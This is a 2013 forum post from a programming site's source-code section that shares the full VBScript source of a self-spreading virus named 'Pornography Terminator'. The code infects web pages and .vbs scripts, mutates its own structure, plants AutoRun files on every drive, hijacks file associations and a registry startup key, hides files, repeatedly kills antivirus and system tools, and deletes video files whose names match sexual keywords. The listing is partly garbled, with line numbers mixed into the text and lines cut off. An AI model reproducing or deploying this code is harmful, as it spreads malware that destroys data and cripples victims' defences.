(VBS Virus) Pornography Terminator Source Code: Sign in Create Account

 Twitter
 Contact Us
 rohitab.com
 Home
 Forums
 IRC
 Code
 Paste
 Sign In
 Create Account
Search
Advanced
Edit Style
 Website
 Forums
 Members
 IRC Chat
rohitab.com ...feed your brain
1. rohitab.com - Forums
2. Programming
3. Source Codes
 Rules, Guidelines & FAQ
 View New Content
[VBS Virus]Pornography Terminator Source code

Started By PanHaiqing, Mar 29 2013 07:00 PM
VBS Virus Pornography Terminator
 Please log in to reply

No replies to this topic
#1
PanHaiqing
Posted 29 March 2013 - 07:00 PM

Forum Newbie

 Probation

 2 posts
 Reputation: 0
Pornography Terminator Virus Source code
[copy][popup][collapse]?
[-]Visual Basic
1 'Administrator4
'HJLMRRQRWYOZX2_25
2
Sub DeleteReg(strkey)
3
Dim tmps
4
Set tmps = CreateObject("WScript.Shell")
5
tmps.RegDelete strkey
6
Set tmps = Nothing
7
End Sub
8
Function ReadReg(strkey)
9
Dim tmps
10
11 ReadReg = tmps.RegRead(strkey)
12
Set tmps = Nothing
13
End Function
14
Sub WriteReg(strkey, Value, vtype)
15
Dim tmps
16
17
If vtype = "" Then
18 tmps.RegWrite strkey, Value
19 Else
20 tmps.RegWrite strkey, Value, vtype
21 End If
22 Set tmps = Nothing
23 End Sub
24 'WQKAULMNKKG2_25
25 'HJLMRRQRWYOZX2_21
26 Function IsSexFile(fname)
IsSexFile = False
27
28 If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
29 InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0
30 InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")
31 IsSexFile = True
32 End If
33 End Function
34 Function Isinfected(buffer, ftype)
35 Isinfected = True
36 Select Case ftype
37 Case "hta", "htm" , "html" , "asp", "vbs"
38 If InStr(buffer, Head_V) = 0 Then
39 Isinfected = False
40 End If
41 Case Else
42 Isinfected = True
43 End Select
44 End Function
45 'WQKAULMNKKG2_21
'HJLMRRQRWYOZX2_22
46
Function GetSFolder(p)
47
Dim objfso
48
Set objfso = CreateObject(GetFSOName())
49 GetSFolder = objfso.GetSpecialFolder(p) & "\"
50
Set objfso = Nothing
51
End Function
52
Function GetUserName()
53
On Error Resume Next
54
Dim Value , UserName
55 Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44
56 UserName = ReadReg(Value)
57 If UserName = "" Then
58 GetUserName = "Administrator"
59 Else
60 GetUserName = UserName
61 End If
62 End Function
63 Function GetFSOName()
64 On Error Resume Next
65 Dim Value , UserName
66 Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
UserName = ReadReg(Value)
67
If UserName = "" Then
68 GetUserName = "Scripting.FileSystemObject"
69 Else
70 GetFSOName = UserName
71 End If
72 End Function
73 Function GetHeadTail(l)
74 Dim Str , buffer
75 If l = 0 Then
76 GetHeadTail = "'" & GetUserName()
77 Else
buffer = GetUserName()
78 Str = ""
79 For i = 1 To Len(buffer)
80 Str = Mid(buffer, i, 1) & Str
81 GetHeadTail = "'" & Str
82 Next
83 End If
84 End Function
85 'WQKAULMNKKG2_22
87 Function ChangeModelOrder(vbsCode, Num_DNA)
89 Dim DNA(), Array_vbsCode()
90 Dim i, Value, flag, j, buffer
91 ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
92 buffer = vbsCode
Randomize
93
For i = 1 To Num_DNA
94 Do
95 Value = Int((Num_DNA * Rnd) + 1)
96 flag = 1
97 For j = 1 To Num_DNA
98 If Value = DNA(j) Then
99 flag = 0
100 Exit For
101 End If
102 Next
103 Loop Until flag = 1
DNA(i) = Value
104 Next
105 For i = 1 To Num_DNA
106 Array_vbsCode(i) = GetModelCode(buffer, i)
107 Next
108 buffer = ""
109 For i = 1 To Num_DNA
110 buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
Next
111 ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
112 End Function
113 'WQKAULMNKKG1_9
115 Sub Run(ExeFullName)
116 Dim WshShell
117 Set WshShell = WScript.CreateObject("WScript.Shell")
118 WshShell.Run ExeFullName
119 Set WshShell = Nothing
120 End Sub
121 Sub CopyFile(objfso, code, pathf)
123 Dim vf
124 Set vf = objfso.OpenTextFile(pathf, 2, true)
125 vf.Write code
126 End Sub
127 Function ChangeName(vbsCode, Names)
128 Dim Name, j, temp, buffer
129 buffer = vbsCode
130 Randomize
131 For Each Name in Names
temp = ""
132
For j = 1 To Len(Name)
133 temp = temp & Chr((Int(Rnd * 26) + 65))
134 Next
135 buffer = Replace(buffer, Name, temp)
136 Next
ChangeName = buffer
137
138 End Function
'WQKAULMNKKG2_26
140 Sub SetTxtFileAss(sFilePath)
142 Dim Value
143 Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
144
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Va
145
End Sub
146
Sub SethlpFileAss(sFilePath)
147
148
Dim Value
149
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
150
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Va
151
152 End Sub
153 Sub SetRegFileAss(sFilePath)
155 Dim Value
157 Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Va
158 End Sub
159 Sub SetchmFileAss(sFilePath)
161 Dim Value
163 Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", V
164 End Sub
165 'WQKAULMNKKG2_16
167 Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
169 Dim tso, buffer, strCode , Maxsize
170 Maxsize = 350000
171 If fi.Size< Maxsize Then
172 Set tso = objfso.OpenTextFile(strPath, 1, True)
buffer = tso.ReadAll()
173 tso.Close
174 If T = 0 Then
175
Select Case ftype
176
Case "hta", "htm", "html", "asp"
177
If Isinfected(buffer, ftype) = False Then
178
Set tso = objfso.OpenTextFile(strPath, 2, true)
179 strCode = MakeScript(VbsCode_WebPage, 0)
180 tso.Write strCode & VBCRLF & buffer
181 Cnt = Cnt + 1
182 End If
183 Case "vbs"
184 If Isinfected(buffer, ftype) = False Then
185 n = InStr(buffer , "Option Explicit")
186 If n<>0 Then
187 buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
188 Set tso = objfso.OpenTextFile(strPath, 2, true)
tso.Write vbsCode_Victim & VBCRLF & buffer
189 Cnt = Cnt + 1
190 Else
191 Set tso = objfso.OpenTextFile(strPath, 2, true)
192 tso.Write vbsCode_Victim & VBCRLF & buffer
193 Cnt = Cnt + 1
194 End If
195 End If
196 Case Else
197 '
198 '
199 End Select
200 ElseIf T = 1 Then
201 If Isinfected(buffer, ftype) = True Then
n = InStrRev(buffer , Tail_V)
202
If n<>0 Then
203 buffer = Replace(buffer, Tail_V, "", n, 1, 1)
204 Set tso = objfso.OpenTextFile(strPath, 2, True)
205 tso.Write strCode & VBCRLF & buffer
206 End If
207 End If
208 End If
209 End If
210 End Sub
213 Function PreInstance()
215 Dim num_cnt
216 Dim strComputer, objWMIService, colProcessList, objProcess
217 num_cnt = 0
PreInstance = False
218 strComputer = "."
219 Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
220 Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " &
221
For Each objProcess in colProcessList
222
If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
223 num_cnt = num_cnt + 1
224 End If
225 Next
226 If num_cnt>= 2 Then
227 PreInstance = True
228 End If
229 End Function
232 Sub RestoreSystem(objfso)
234 Dim Value, dc, d, HCULoad
235 Call SafeSet()
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\L
236
237 If ReadReg(HCULoad) = FullPath_V1 Then
238 Call DeleteReg(HCULoad)
239 End If
Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
240
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Valu
241
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\
242
End If
243
244 Value = "regedit.exe " & """%1"""
245 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Valu
246 Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\
247 End If
248 Value = GetSFolder(1) & "hh.exe " & """%1"""
249 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Val
250 Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command
251 End If
252 Value = "%SystemRoot%\system32\winhlp32.exe %1"
253 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Valu
254 Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\
255 End If
256 Value = """%1"" %*"
257 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Valu
258 Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\"
259 End If
260 Set dc = objfso.Drives
261 For Each d In dc
262 If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
263 objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
264 objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
265 End If
Next
266
If objfso.FileExists(FullPath_V1) = True Then
267
268 Set vf = objfso.GetFile(FullPath_V1)
vf.Delete
269
End If
270
If objfso.FileExists(FullPath_V0) = true Then
271
Set vf = objfso.GetFile(FullPath_V0)
272 vf.Delete
273 End If
274 If objfso.FileExists(FullPath_Config) = True Then
275 objfso.DeleteFile FullPath_Config , True
276 End If
277 End Sub
278 'WQKAULMNKKG1_8
280 Sub MonitorSystem(objfso, vbsCode)
282 Dim ProcessNames
283 ProcessNames =
284 Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "re
Do
285
Call KillProcess(ProcessNames)
286
Call InvadeSystem(objfso, vbsCode)
287 WScript.Sleep 5000
288 Loop
289 End Sub
290 'WQKAULMNKKG1_5
292 Function Head()
293 Head = VBCRLF & "'HJLMRRQRWYOZX1_1" & VBCRLF &_
294 "On Error Resume Next" & VBCRLF &_
295 "Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_M
296 "Dim ModelHead, ModelTail" & VBCRLF &_
297 "Cnt = 0" & VBCRLF &_
298 "CntMax = 1000" & VBCRLF &_
299 "Version = ""4""" & VBCRLF &_
300 "Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_
301 "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
302
"FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
303
304 "FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令" & VBCRLF &_
305 "FullPath_Config= GetSFolder(1) & GetUserName() & "".ini""" & VBCRLF &_
306 "Sum_ModelCode = 26" & VBCRLF &_
307 "Head_V= GetHeadTail(0)" & VBCRLF &_
308 "Tail_V= GetHeadTail(1)" & VBCRLF &_
309 "ModelHead=""'HJLMRRQRWYOZX""" & VBCRLF &_
310 "ModelTail=""'WQKAULMNKKG""" & VBCRLF
311 End Function
312 Function VictimHead()
313 VictimHead = Head() & VBCRLF &_
314 "Call VictimMain()" & VBCRLF &_
315 "Sub VictimMain()" & VBCRLF &_
316 " Call ExeVbs_Victim()" & VBCRLF &_
317 "End Sub" & VBCRLF &_
318 "'WQKAULMNKKG1_1" & VBCRLF
319 End Function
320 Function VirusHead()
321 VirusHead = Head() & VBCRLF &_
322 "Call VirusMain()" & VBCRLF &_
323 "Sub VirusMain()" & VBCRLF &_
324 " On Error Resume Next" & VBCRLF &_
325 " Call ExeVbs_Virus()" & VBCRLF &_
326 "End Sub" & VBCRLF & VBCRLF &_
328 End Function
329 Function WebHead()
330 WebHead = Head() & VBCRLF &_
331 "Call WebMain()" & VBCRLF &_
332 "Sub WebMain()" & VBCRLF &_
333 " On Error Resume Next" & VBCRLF &_
334 " Call ExeVbs_WebPage()" & VBCRLF &_
335 "End Sub" & VBCRLF &_
337 End Function
338 'WQKAULMNKKG1_4
340 Function GetModelCode(vbsCode, N_ModelCode)
342 Dim n, n1, buffer
343 buffer = vbsCode
344 If N_ModelCode>= 1 And N_ModelCode<= 9 Then
345 n = InStr(buffer, ModelHead & "1_" & N_ModelCode)
346 n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode)
347 GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode))
348 ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then
352 ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then
356 End If
357 End Function
360 Sub ExeVbs_WebPage()
362 Dim objfso, vbsCode, VbsCode_Virus
363 Set objfso = CreateObject(GetFSOName())
364 vbsCode = GetScriptCode("vbscript")
365 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
366
Call InvadeSystem(objfso, VbsCode_Virus)
367
368 Set objfso = Nothing
369 End Sub
370 Sub ExeVbs_Victim()
372 Dim objfso, vbsCode, VbsCode_Virus
374 vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_
375 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
376 Call InvadeSystem(objfso, VbsCode_Virus)
377 Call Run(FullPath_V1)
379 End Sub
380 'WQKAULMNKKG1_2
382 Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
384 Dim pfo, pf, pfi, ext
385 Dim psfo, ps
386 Set pfo = objfso.GetFolder(strPath)
387 Set pf = pfo.Files
388 For Each pfi In pf
389 If Cnt >= CntMax Then
390 Exit For
391 End If
392 ext = LCase(objfso.GetExtensionName(pfi.Path))
393 Select Case ext
394 Case "hta", "htm", "html", "asp", "vbs"
395 Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim,
396 Case "mpg", "rmvb", "avi", "rm"
397 If IsSexFile(pfi.Name) = True Then
398 pfi.Delete
399 End If
400 End Select
401 Next
402 Set psfo = pfo.SubFolders
403 For Each ps In psfo
404 If Cnt >= CntMax Then
405 Exit For
406 End If
407 Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
408 Next
409 End Sub
'WQKAULMNKKG2_11
411 Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
413
Dim d , dc
414
Set dc = objfso.Drives
415
For Each d In dc
416
If Cnt >= CntMax Then '
417
Exit For
418
End If
419
420 If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
'If d.DriveType = 1 Then
421
Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
422 'End If
423 End If
424 Next
425 End Sub
428 Sub ExeVbs_Virus()
430 Dim objfso, objshell, FullPath_Self, Name_Self, Names
431 Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
432 Dim Order, Order_Order, Order_Para
433 Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody
435 Set objshell = CreateObject("WScript.Shell")
436 FullPath_Self = WScript.ScriptFullName
437 Name_Self = WScript.ScriptName
438 Names = Array("HJLMRRQRWYOZX", "WQKAULMNKKG")
439 Set oArgs = WScript.Arguments
ArgNum = 0
440
Do While ArgNum < oArgs.Count
441
Para_V = Para_V & " " & oArgs(ArgNum)
442 ArgNum = ArgNum + 1
443 Loop
444 SubPara_V = LCase(Right(Para_V, 3))
445 Select Case SubPara_V
446 Case "run"
447 RunPath = Left(FullPath_Self, 2)
448 Call Run(RunPath)
449 vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCo
451 VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
454 Case "txt", "log"
455 RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
456 Call Run(RunPath)
458 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCo
463 Case "reg"
464 Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
465 Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
466
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCo
471 Case "chm"
472 Para_V = "hh.exe " & """" & Trim(Para_V) & """"
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
477
478
Call Run(FullPath_V1)
479
Case "hlp"
480
Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
481
vbsCode = GetSelfCode(objfso, FullPath_Self)
485
486
Call Run(FullPath_V1)
487
Case Else
488
If PreInstance = True Then
489 WScript.Quit
490 End If
491
If IsOK(objfso, Date(), FullPath_Config) = False Then
492
If objfso.FileExists(FullPath_Config) = True Then
493 Order = Trim(ReadOK(objfso, FullPath_Config))
494 Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
495 Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) -
496 End If
497 Select Case Order_Order
498 Case "InfectFiles"
500 MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody
501 VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
502 VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
503 VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBod
504 VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
505
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody
508 Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
509 Order_Para = Order_Para + Cnt
510 If Order_Para>2000 Then
511 VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
515 Order_Para = Order_Para + Cnt
516 If Order_Para>2000 Then
517 Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件
518 src='http://www.rohitab.com/discuss/public/style_emoticons/<#EMO_DIR#>/sleep.png' class
519 Else
520 Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para
521 End If
523 Call MonitorSystem(objfso, VbsCode_Virus)
524 Case "Msg"
525 MsgBox Order_Para
526 Call WriteOK(objfso, FullPath_Config, "", "")
533 Case "UnLoadMe"
534 Call RestoreSystem(objfso)
Wscript.Quit
535
Case "KillVirus"
536
537 Call RestoreSystem(objfso)
Wscript.Quit
539
Case Else
542 VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody
543 VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
544
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBod
545 VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
546 VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
547 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody
549
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
550
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
551
554 End Select
Else
557 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF
558
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) '改变模块组合顺
559
560 VbsCode_Virus = ChangeName(VbsCode_Virus, Names) '改变模块标志名称
562 End If
563 End Select
565 Set objshell = Nothing
566 End Sub
567 'WQKAULMNKKG1_3
570 Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelC
571 Dim ModelHead, ModelTail
572 Cnt = 0
CntMax = 1000
573 Version = "4"
574 Name_V1 = GetUserName() & ".vbs"
575 FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向
576 FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令
577 FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
578 Sum_ModelCode = 26
579 Head_V= GetHeadTail(0)
580 Tail_V= GetHeadTail(1)
ModelHead="'HJLMRRQRWYOZX"
581
ModelTail="'WQKAULMNKKG"
582
Call VirusMain()
583
Sub VirusMain()
584
585
Call ExeVbs_Virus()
586
End Sub
587 'WQKAULMNKKG1_1
589 Function GetVersion(objfso, path_v)
590 Dim FV, buffer
591 Set FV = objfso.OpenTextFile(path_v, 1)
592 buffer = FV.ReadAll()
593 GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
594 End Function
595 Function GetScriptCode(Languages)
597 Dim soj
598 For Each soj In document.Scripts
599 If LCase(soj.Language) = Languages Then
600 Select Case LCase(soj.Language)
601 Case "vbscript"
602 GetScriptCode = soj.Text
603 Exit Function
604 Case "javascript"
605 GetScriptCode = soj.Text
606 Exit Function
607 End Select
608 End If
609 Next
610 End Function
611 Function GetSelfCode(objfso, FullPath_Self)
613 Dim n, n1, buffer, Self
614 Set Self = objfso.OpenTextFile(FullPath_Self, 1)
615 buffer = Self.ReadAll
n = InStr(buffer, Head_V)
616 n1 = InstrRev(buffer, Tail_V)
617 buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
618 GetSelfCode = buffer
619 Self.Close
620 End Function
621 Function GetMainBody(vbsCode, Sum_ModelCode)
622 Dim i
623 For i = 2 To Sum_ModelCode
624 GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
625 Next
626 End Function
'WQKAULMNKKG2_19
628 Sub DeSafeSet()
629
Dim HLMShow , HCUAdvanced, HCUExplorer
630 HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ad
631 HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
632 HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
633 Call WriteReg (HCUExplorer, 129, "REG_DWORD")
634 Call WriteReg (HCUAdvanced, 0, "REG_DWORD")
635 Call WriteReg (HLMShow, 0, "REG_DWORD")
636 End Sub
637 Sub SafeSet()
638 Dim HLMShow , HCUSSHidden, HCUHidden
639 Dim HCUExplorer
640 HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ad
641 HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HCUHidden = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\A
642
Call WriteReg (HCUHidden, 1, "REG_DWORD")
643
644 Call WriteReg (HCUAdvanced, 1, "REG_DWORD")
645 Call WriteReg (HLMShow, 1, "REG_DWORD")
646 End Sub
'WQKAULMNKKG2_13
648 Function MakeScript(strCode, T)
649 If T = 1 Then
650
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(str
651 Else
652 MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "
653 End If
654 End Function
657 Sub AutoRun(objfso, D, vbsCode)
659 Dim path_autorun, path_vbs, inf_autorun
660 path_autorun = D & ":\AutoRun.inf"
661 path_vbs = D & ":\" & Name_V1
662 If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or
663 If objfso.FileExists(path_autorun) = True Then
objfso.DeleteFile path_autorun, True
664
665 End If
666 If objfso.FileExists(path_vbs) = True Then
objfso.DeleteFile path_vbs, True
667 End If
668 Call CopyFile(objfso, vbsCode, path_vbs)
669 Call SetFileAttr(objfso, path_vbs)
670 inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Name_V1 & " "
671 & "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\Auto
672 ""AutoRun"""
673 Call CopyFile(objfso, inf_autorun, path_autorun)
674 Call SetFileAttr(objfso, path_autorun)
675 End If
676 End Sub
677 'WQKAULMNKKG1_6
679 Function ReadOK(objfso, FullPath_OK)
681 Dim vf, buffer
682 Set vf = objfso.OpenTextFile(FullPath_OK, 1)
683 buffer = vf.ReadAll
684 ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
685 End Function
686 Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
688 Dim vf1
689 objfso.DeleteFile FullPath_OK, True
690 Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
691 vf1.Write "OK" & VBCRLF
vf1.WriteLine Date()
692
vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
693
Call SetFileAttr(objfso, FullPath_OK)
694
End Sub
695
'WQKAULMNKKG2_14
697 Sub KillProcess(ProcessNames)
699 Dim objShell, intReturn, name_exe
700 Set objShell = WScript.CreateObject("WScript.Shell")
701 strComputer = "."
702 Set objWMIServices = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
703 For Each ProcessName in ProcessNames
704 Set colProcessList = objWMIServices.Execquery(" Select * From win32_process whe
705 For Each objProcess in colProcessList
706 intReturn = objProcess.Terminate
707 Select Case intReturn
708 Case 2
709 name_exe = objProcess.Name
710 name_exe = Left(name_exe, Len(name_exe) -4)
711 objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
712 End Select
713 Next
714 Next
715 Set objShell = Nothing
716 End Sub
'WQKAULMNKKG2_24
718 Sub InvadeSystem(objfso, vbsCode)
720 Dim Value, HCULoad, vbsCode_Virus, dc, d
721
Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
722 HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\L
723 vbsCode_Virus = vbsCode
724 Set dc = objfso.Drives
725 For Each d In dc
726 If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
727 Call AutoRun(objfso, d.DriveLetter, vbsCode_Virus)
728 End If
729 Next
730 If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Versio
731 objfso.DeleteFile FullPath_V1 , True
732 Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
733 Call SetFileAttr(objfso, FullPath_V1)
734 Else
737 End If
738 If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version
739 objfso.DeleteFile FullPath_V0 , True
Else
742
745 End If
746 If ReadReg(HCULoad)<> FullPath_V1 Then
747 Call WriteReg (HCULoad, FullPath_V1, "")
748 End If
749 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Valu
750 Call SetTxtFileAss(FullPath_V0)
751 End If
752 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Valu
753 Call SetRegFileAss(FullPath_V0)
754 End If
755 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Val
756 Call SetchmFileAss(FullPath_V0)
757 End If
758 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Valu
759 Call SethlpFileAss(FullPath_V0)
760 End If
761 Call DeSafeSet()
762 End Sub
763 'WQKAULMNKKG1_7
765 Sub SetFileAttr(objfso, pathf)
766 Dim vf
767 Set vf = objfso.GetFile(pathf)
768 vf.Attributes = 6
769 End Sub
'WQKAULMNKKG2_15
771 Function IsOK(objfso, Now_V, path_f)
773
Dim vf, p1, p2, p3
774 IsOK = False
775 Set vf = objfso.OpenTextFile(path_f, 1)
776 p1 = Trim(vf.ReadLine)
779 If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then
IsOK = True
780
End If
781
782 If p3 = "Admin" Then
MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!"
783 IsOK = True
784 n = InputBox("0:退出； 1:监视系统； 2:传染文件", "SuperVirus脚本测试!")
785
If n = 0 Then
786 Wscript.Quit
787 ElseIf n = 1 Then
788 IsOK = True
789 ElseIf n = 2 Then
790 IsOK = False
791 End If
792 End If
793 End Function
795 'rotartsinimdA
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
Attached Files
 DNAOrder.zip 6.32KB 376 downloads
 Back to top
Back to Source Codes



Also tagged with one or more of these keywords: VBS, Virus, Pornography
Terminator
Programming → Programming →
C++ Logic bomb - monday virus
Started by droppr, 04 May 2017 C++, logic bomb, virus
PE infection or file appending?
Started by zwclose7, 09 Apr 2017 PE infection, file appending and 3 more...
Infecting virus
Started by kuku, 03 Dec 2016 virus, malware, infection, c++
Malware Analysis - Step by Step Approach for Newbies
Started by aviator, 22 Aug 2016 malware, virus and 4 more...

Help! How to reverse a .dll malware?
